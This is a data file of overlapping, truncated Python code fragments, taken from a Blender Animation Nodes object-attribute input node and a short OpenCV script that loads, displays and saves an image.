"attribute: StringProperty(name = \"Attribute\", default = \"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\",",
"\"value\") def draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout,",
"self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else: return \"value = object.\" +",
"\"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default = \"\", update = executionCodeChanged) def create(self):",
"+ code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield \"",
"bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default = 160 errorHandlingType =",
"evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else: return \"value =",
"... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object",
"self.attribute else: return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\")",
"\"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield \" value = None\"",
"yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield \" value =",
"layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self, required): code =",
"events import executionCodeChanged from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname =",
"if object: self.setErrorMessage('Attribute not found')\" yield \" value = None\" @property def evaluationExpression(self):",
"= \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def",
"> 0)\" yield \"value = None\" return yield \"try:\" yield \" \" +",
"getExecutionCode(self, required): code = self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show =",
"\"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution",
"draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text",
"None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else:",
"object\" + self.attribute else: return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item",
"errorHandlingType = \"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default = \"\", update = executionCodeChanged)",
"code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield \" value",
"from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label =",
"= None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute",
"\"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default = 160 errorHandlingType = \"MESSAGE\" attribute:",
"else: return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType"
] |
[
"img = cv2.imread( 'image.jpg' ) cv2.imshow( \"Image\", img ) cv2.waitKey( 0 ) cv2.imwrite(",
"import cv2 img = cv2.imread( 'image.jpg' ) cv2.imshow( \"Image\", img ) cv2.waitKey( 0",
"<gh_stars>0 import cv2 img = cv2.imread( 'image.jpg' ) cv2.imshow( \"Image\", img ) cv2.waitKey(",
"= cv2.imread( 'image.jpg' ) cv2.imshow( \"Image\", img ) cv2.waitKey( 0 ) cv2.imwrite( \"new_image.jpg\",",
") cv2.imshow( \"Image\", img ) cv2.waitKey( 0 ) cv2.imwrite( \"new_image.jpg\", img ) cv2.destroyAllWindows()",
"'image.jpg' ) cv2.imshow( \"Image\", img ) cv2.waitKey( 0 ) cv2.imwrite( \"new_image.jpg\", img )",
"cv2.imread( 'image.jpg' ) cv2.imshow( \"Image\", img ) cv2.waitKey( 0 ) cv2.imwrite( \"new_image.jpg\", img",
"cv2 img = cv2.imread( 'image.jpg' ) cv2.imshow( \"Image\", img ) cv2.waitKey( 0 )"
] |